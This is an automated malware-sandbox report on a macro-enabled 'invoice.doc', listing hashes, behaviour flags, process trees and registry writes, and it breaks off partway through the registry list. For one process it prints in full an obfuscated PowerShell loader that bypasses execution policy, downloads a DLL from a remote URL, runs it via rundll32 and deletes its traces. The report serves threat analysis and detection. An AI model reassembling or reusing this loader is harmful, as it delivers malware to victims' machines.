General Info

File name

invoice.doc

Full analysis
https://app.any.run/tasks/069880d3-50de-4965-bfab-aed9de17cc1f
Verdict
Malicious activity
Analysis date
11/8/2018, 10:35:02
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/msword
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: James Smith, Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun Nov 4 19:24:00 2018, Last Saved Time/Date: Wed Nov 7 02:32:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5

1374457044433a7ad196c1e43acb15c1

SHA1

98dc8e8de4c6ec1e0f39331c68b2e89c8e86f6ee

SHA256

b84e2524f59f318d5f8bd01b4ccc38fbd691f382873892d5304d760faf0064c7

SSDEEP

6144:vTGfXFMFu9mycXxnBWbtzcn3lgO4VoX9B38Js+:b41SyqxnBWb5cVgZaXv8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
on
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • chaua.exe (PID: 700)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 2916)
Executable content was dropped or overwritten
  • WINWORD.EXE (PID: 2916)
Creates files in the user directory
  • chaua.exe (PID: 700)
Uses RUNDLL32.EXE to load library
  • chaua.exe (PID: 700)
Dropped object may contain Bitcoin addresses
  • WINWORD.EXE (PID: 2916)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 2916)
Creates files in the user directory
  • WINWORD.EXE (PID: 2916)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.doc
|   Microsoft Word document (80%)
EXIF
FlashPix
Title:
null
Subject:
null
Author:
James Smith
Keywords:
null
Template:
Normal.dotm
LastModifiedBy:
Windows User
RevisionNumber:
3
Software:
Microsoft Office Word
TotalEditTime:
1.0 minutes
CreateDate:
2018:11:04 19:24:00
ModifyDate:
2018:11:07 02:32:00
Pages:
1
Words:
null
Characters:
1
Security:
None
CodePage:
Windows Cyrillic
Company:
null
Lines:
1
Paragraphs:
1
CharCountWithSpaces:
1
AppVersion:
12
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
null
HeadingPairs
null
null
CompObjUserTypeLen:
39
CompObjUserType:
???????? Microsoft Office Word 97-2003

Screenshots

Processes

Total processes
37
Monitored processes
3
Malicious processes
1
Suspicious processes
1

Behavior graph

+
drop and start start winword.exe chaua.exe rundll32.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2916
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\shdocvw.dll
c:\users\admin\appdata\local\temp\qgnrahnui3\chaua.exe
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\windowscodecs.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\program files\microsoft office\office14\proof\1033\msgr3en.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\oleacc.dll
c:\program files\common files\system\ado\msadox.dll
c:\windows\system32\netutils.dll

PID
700
CMD
"C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe" $egabmypniujouovq6='ui3''';$tgvlrpmueqmvflyoaiwf='path=($en';$yeaeeaujsosbuua1=';Se';$eqkzlkejvawpqpqifkaydwuyeda='org/Xk';$ndojlceoiuoierjerlaqgmby='t System';$cahaaiilusephaohps05='php'',$';$ouboyaeuycah='t-Execu';$gyvouelayafgarddzy1='ss; $';$aobdseetzparmarmuuwf='''\z';$baaxslplaidrvehoqaymk60='cy By';$bvfrepnjwjpusrjjrwiaoffsu='hwh';$euukejdtncnqojxaoi='.dll'');';$ooqqbuoifbiiy='dFile(';$qwlofnexwuaouioaufbw='data+';$btouqdroaktfhyqgpuyyy='.Web';$fbrnyieyuiauiz='pass -Sc';$icfraektfrylkacqgwzrgfmvmzn82='rahn';$pjblncsnvyllrba25='qQkPWluO.';$wyssfngydmdwbpbsmk='prime';$uvfhheooqeaztoeg='l32 $p';$emnhxakhvharrqeobntmjkoyijq='path);';$yyvjvzbdtjnzclrpwsbswryupx='tionPoli';$yeozwuhayiomqagwja0='Downloa';$qrrflzpgijzpwkbnfktoke='(New-Ob';$znrxaxsebqjulaixhoukvxu7='Item ';$yrmeeeisxltkamiaaltb='''http://';$ioynehfvdkjqjeocmbovrs='se -for';$vtuiqqbukzaurcups1='vyeo';$urllsrgiczilzrboaetgsxhknlp='client).';$kbyowbudphqaoulhuesjjtyls='.Net';$vgnynvatppveuey60='fhj''';$alcpfemwsvbctgtlmlajfuiuyeq='ath , ''';$yjuuicgzcweoiut='f1'';Rem';$yyvcnzapjqjfxndzlldwattao='p + ''\qgn';$akouyyojompjrab='($env:tem';$mrdpdblcakqfyuydixminu05='$hj = ''';$zoflvqquooeyzilbiiqpouzlo=') -recur';$uerehhhpiebylwuauia='ove-';$micvzqjnkskthioyoskdqo='timer.';$rbkdlyuoterlqhiutjloe='v:app';$otruaanwcoaxmsxp=' rundl';$pxilntduusvjguyabvodpy='ope Proce';$aeaktrrowacvjlzyabew='ce;';$iaolcifsdafiuoesiyj='jec'; Invoke-Expression ($mrdpdblcakqfyuydixminu05+$bvfrepnjwjpusrjjrwiaoffsu+$vgnynvatppveuey60+$yeaeeaujsosbuua1+$ouboyaeuycah+$yyvjvzbdtjnzclrpwsbswryupx+$baaxslplaidrvehoqaymk60+$fbrnyieyuiauiz+$pxilntduusvjguyabvodpy+$gyvouelayafgarddzy1+$tgvlrpmueqmvflyoaiwf+$rbkdlyuoterlqhiutjloe+$qwlofnexwuaouioaufbw+$aobdseetzparmarmuuwf+$vtuiqqbukzaurcups1+$euukejdtncnqojxaoi+$qrrflzpgijzpwkbnfktoke+$iaolcifsdafiuoesiyj+$ndojlceoiuoierjerlaqgmby+$kbyowbudphqaoulhuesjjtyls+$btouqdroaktfhyqgpuyyy+$urllsrgiczilzrboaetgsxhknlp+$yeozwuhayiomqagwja0+$ooqqbuoifbiiy+$yrmeeeisxltkamiaaltb+$wyssfngydmdwbpbsmk+$micvzqjnkskthioyoskdqo+$eqkzlkejvawpqpqifkaydwuyeda+$pjblncsnvyllrba25+$cahaaiilusephaohps05+$emnhxakhvharrqeobntmjkoyijq+$otruaanwcoaxmsxp+$uvfhheooqeaztoeg+$alcpfemwsvbctgtlmlajfuiuyeq+$yjuuicgzcweoiut+$uerehhhpiebylwuauia+$znrxaxsebqjulaixhoukvxu7+$akouyyojompjrab+$yyvcnzapjqjfxndzlldwattao+$icfraektfrylkacqgwzrgfmvmzn82+$egabmypniujouovq6+$zoflvqquooeyzilbiiqpouzlo+$ioynehfvdkjqjeocmbovrs+$aeaktrrowacvjlzyabew);
Path
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe
Indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\users\admin\appdata\local\temp\qgnrahnui3\chaua.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\rundll32.exe

PID
1684
CMD
"C:\Windows\system32\rundll32.exe" C:\Users\admin\AppData\Roaming\zvyeo.dll f1
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
chaua.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\cryptbase.dll

Registry activity

Total events
1502
Read events
1096
Write events
402
Delete events
4

Modification events

PID
Process
Operation
Key
Name
Value
2916
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2916
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\5DAD24
2916
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery
2916
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
(#l
28236C00640B0000010000000000000000000000
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1298661391
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661504
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661505
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
640B00005A1E5A624677D40100000000
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
n$l
6E246C00640B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
~'l
7E276C00640B000006000000010000005600000002000000460000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C0069006E0076006F006900630065002E0064006F006300000000000000
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1298661380
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{47738947-EEC1-45D7-8F4A-45D189CBAFD0}
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D477466381BD10][O00000000]*C:\Users\admin\Desktop\
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D4774663840700][O00000000]*C:\Users\admin\Desktop\invoice.doc
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\5DAD24
5DAD24
04000000640B00002200000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C0069006E0076006F006900630065002E0064006F0063000B00000069006E0076006F006900630065002E0064006F00630000000000010000000000000098324E624677D40124AD5D0024AD5D0000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
019C826E445A4649A5B00BF08FCC4EEE
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1298661401
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1298661402
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1298661401
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1298661402
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661418
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1298661419
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1298661403
2916
WINWORD.EXE
write
